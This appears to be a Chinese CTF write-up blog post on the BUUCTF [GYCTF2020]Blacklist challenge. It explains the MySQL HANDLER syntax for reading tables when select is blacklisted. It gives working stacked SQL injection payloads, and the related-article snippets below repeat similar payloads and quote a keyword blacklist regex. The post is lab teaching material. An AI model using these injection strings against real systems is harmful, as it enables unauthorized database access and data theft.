BUUCTF-WEB-[GYCTF2020]Blacklist

最新推荐文章于 2024-02-05 15:01:15 发布
最新推荐文章于 2024-02-05 15:01:15 发布
阅读量793 收藏 7
点赞数 3
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/r1727337824/article/details/108290545
版权

mysqli-HANDLER绕过

文章目录

前言

每天一道题,能多不能少

一、HANDLER

基本形式

HANDLER tbl_name OPEN [ [AS] alias]

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]

HANDLER tbl_name CLOSE 
//其中  HANDLER tbl_name OPEN AS example
//其后  HANDLER example READ index_name="example2"

注意:HANDLER查询性能比SELECT更好

二、步骤


提交 1’ 报错确定存在sql注入
提交 1’# 返回正常
提交 1’select# 返回黑名单
禁用了select,联合注入行不通
考虑堆叠注入

在这里插入图片描述在这里插入图片描述

爆出库名,表名,列名

由于禁用了prepare,rename
预处理方法,重命名方法都不行

直接看大佬payload:

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#

在这里插入图片描述

新姿势get

总结

查询资料,handler更多用法:


//表名 test
mysql> handler test open as c;    //打开
Query OK, 0 rows affected (0.01 sec)


mysql> handler c read `PRIMARY`=
最低0.47元/天 解锁文章
Y1wan.
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DISCORD.JS-BlackList-UnBlackList:卸载清单DISCORD.JS BlackListUnBlackLis命令
02-18
:information: DISCORD.JS-BlackList-UnBlackLis 将清单中的内容输入到BlackList / UnBlackList命令中。 默西·德·莱塞尔 :star: (STAR)Si Vous L'avezutilisépour votre bot。 :laptop: 代码Voici评论进口商...
blacklist-jee
07-08
blacklist-jee 您将需要 Java8 来编译和运行。 检查您的应用程序是否正在运行在安装了 git、java8、docker 和 maven 的本地 Ubuntu VM 中进行开发先决条件:已安装 VirtualBox 和 Vagrant。 从该项目的根目录初始化...
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询
weixin_44632787的博客
06-19 654
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询 启动挑战项目,发现前端界面显示Black list is so weak for you,isn’t it 又是一道用堆叠查询的题目,看来CTF也很喜欢考这类型的题目呀! 首先爆出数据库:1’;show databases; 然后爆出表名:1’; show tables; 然后显示某个表里面列的信息:1’;show columns from FlagHere; 接下来的才是重点,在MYSQL数据库中: 可以用handl
buuctf [GYCTF2020]Blacklist
m0_63883187的博客
01-14 127
不懂得欢迎私信交流
BUUCTF [GYCTF2020] Blacklist
Senimo
12-08 1366
BUUCTF [GYCTF2020] Blacklist 启动靶机: 提交参数1后正常回显内容:
[GYCTF2020]Blacklist1-BUUCTF-详解
chinese_cabbage0的博客
02-05 1748
主要是buuctf的整个题目的解题过程,比较好理解,也比较全面,大家可以参考一下
BUUCTF-Blacklist
m0_47571887的博客
11-10 685
前言: 这道题我之前的文章攻防世界-supersqli是一道一样的,只不过这题是个进阶版,还有get了一个新的注入方式。 首先打开题目,看到查询框我们进行注入 禁用了很多东西啊,但貌似show没有禁用,可以查询一下数据库还有表 这里看到flaghere,但rename被禁用掉了,所以不能通过更改表名来进行查询,这里就要用一个其他得到注入方法 1';handler FlagHere open; //打开FlagHere文件 handler FlagHere read first;
前端开源库-lws-blacklist
08-30
要使用`lws-blacklist`,首先需要将`blacklist-master`解压并集成到您的LWS项目中。这通常涉及到以下步骤: - 安装依赖:确保系统已经安装了libwebsockets库和必要的构建工具。 - 配置项目:在`CMakeLists.txt`或...
Mikrotik-Blacklist
03-05
/tool fetch address=raw.githubusercontent.com host=raw.githubusercontent.com mode=https src-path=stathis/Mikrotik-Blacklist/master/a_blacklist_file.rsc/import a_blacklist_File.rsc其他资讯此回购应该...
Public Sessions Update Test-Blacklist-crx插件
04-02
"Public Sessions Update Test-Blacklist-crx插件" 是一款针对公开会话的安全管理扩展,主要用于浏览器环境。"crx"是Chrome扩展的文件格式,表明这是一款针对Google Chrome浏览器的插件。这个插件的核心功能是对在...
buuctf-[GYCTF2020]Blacklist1(小宇特详解)
小宇的web博客
02-09 1616
buuctf-[GYCTF2020]Blacklist1(小宇特详解) 1.先看题目是一道sql注入的题目 先尝试进行闭合 payload:1’ 这里可以试出来是'来进行闭合即可 2.然后尝试着进行联合查询 发现是进行了过滤。 3.这里尝试着进行堆叠注入 payload:1’;show tables;# 4.查表 payload:1’; show columns from FlagHere;# 这里屏蔽了许多东西 5.这里由于rename,和alter被过滤了,这里考虑利用HANDLER语句 这里
[GYCTF2020] web题-Blacklist
BROTHERYY的博客
07-24 524
复现环境:buuoj.cn 打开题目 发现过滤了一些关键字 发现跟强网杯的随便注一样,可以使用堆叠注入。 可以看到有FlagHere和words这两个表,过滤了一些关键字 这里使用mysql特有的查询-handler 通过handler table_name open打开一张表,在这里声明一个名为table_name的句柄。 通过handler table_name read first获取句柄的第一行,通过read next依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。 详细的
[GYCTF2020]Blacklist && 强网杯随便注
SopRomeo的博客
04-08 1547
强网杯随便注 先测试 字符型 1' or '1'='1 return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 过滤了select 先看表,看列 堆叠注入 payload: 1';show tables;%23 1';show columns from `1919810931114514`;%...
BUUCTF[GYCTF2020]Blacklist
weixin_45253622的博客
05-22 306
sql注入题型,测试发现黑名单如下: 大小写,双写,编码均不可绕过。 可用的还有,or and unionshow 输入:1 or 1=1 无反应 输入:1' or '1' ='1如下: 字符型注入,由于show可用,所以我们想到堆叠注入: 1';show tables; 查看字段名, 1';show columns from FlagHere; 过滤机制过于强大,所以我们使用handler, HANDLER...OPEN语句打开一个表,使其可以使用...
[GYCTF2020]Blacklist
夜幕下的灯火阑珊的博客
05-12 886
知识点 堆叠注入 参考堆叠注入tips 查表名、列名、字段名 show databases; show tables; show columns from `table_name`; 本题使用HANDLER查看flag 1'; handler FlagHere open; handler FlagHere read first; handler FlagHere close;#
2020/7/10 - [GYCTF2020]Blacklist - handler绕过sql黑名单
抒情诗
07-10 876
文章目录1.先看是什么类型的注入2.测试堆叠注入3.最终payload 这个跟[强网杯 2019]随便注这道题有些类似,都是堆叠注入的形式,不同有 1.那个似乎是数字型注入,这个是字符型的注入 2.那个黑名单过滤的少,这个几乎能用的都过滤了 1.先看是什么类型的注入 分别用 1 or 1=1# 1’ or 1=1# 1" or 1=1# 执行测试,返回全部库信息的即是该类型。试一下,发现是单引号字符型注入。 2.测试堆叠注入 使用以下payload测试是否是堆叠注入 1';show databases;#
[GYCTF2020]Blacklist堆叠注入
qq_43801002的博客
04-27 3324
[GYCTF2020]Blacklist 1';show columns from `FlagHere`; %23 查看列 过滤了这么多,比强网杯过滤更加严格了 这里我们用到handler这个东西 HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭...
BUUCTF_Web题目题解记录1
Altering_Ji的博客
07-11 2463
记录一下buu 刷题网站上最近做的三道web题目:[GYCTF2020]Blacklist(堆叠注入)、[网鼎杯 2020 青龙组]AreUSerialz(反序列化)、[GXYCTF2019]BabyUpload(文件上传)
/etc/modprobe.d/blacklist-nouveau.conf
最新发布
04-14
`/etc/modprobe.d/blacklist-nouveau.conf`是一个配置文件,用于禁用Linux系统中的nouveau显卡驱动程序。nouveau是一个开源的NVIDIA显卡驱动程序,但在某些情况下可能会导致系统出现问题。通过在`/etc/modprobe.d/...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值